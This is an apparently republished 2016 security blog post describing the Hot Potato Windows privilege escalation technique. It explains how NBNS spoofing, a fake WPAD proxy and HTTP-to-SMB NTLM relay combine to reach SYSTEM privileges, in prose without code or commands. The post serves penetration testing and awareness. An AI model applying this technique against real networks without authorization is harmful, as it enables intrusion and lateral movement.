Published on January 17th, 2016 📆 | 7751 Views ⚑0
Hot Potato — Windows Privilege Escalation
Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack
Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. Using this technique, we can elevate our privilege on a Windows workstation from the lowest levels to “NT AUTHORITY\SYSTEM” – the highest level of privilege available on a Windows machine.
This is important because many organizations unfortunately rely on Windows account privileges to protect their corporate network. Often it is the case that once an attacker is able to gain high privileged access to ANY workstation or server on a Windows network, they can use this access to gain “lateral movement” and compromise other hosts on the same domain. As an attacker, we often gain access to a computer through a low privilege user or service account. Gaining high privilege access on a host is often a critical step in a penetration test, and is usually performed in an ad-hoc manner as there are no known public exploits or techniques to do so reliably.
The techniques that this exploit uses to gain privilege escalation aren’t new, but the way they are combined is. Microsoft is aware of all of these issues and has been for some time (circa 2000). These are unfortunately hard to fix without breaking backward compatibility and have been leveraged by attackers for over 15 years.
The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches. Each part corresponds to an already well known attack that has been in use for years:
Local NBNS Spoofer
NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments.
Fake WPAD Proxy Server
In Windows, Internet Explorer by default will automatically try to detect network proxy setting configuration by accessing the URL “https://wpad/wpad.dat”
HTTP -> SMB NTLM Relay
Part of Windows Integrated Auth protocol suite. Essentially a challenge-response design
Windows Server 2008
Windows 8/10/Server 2012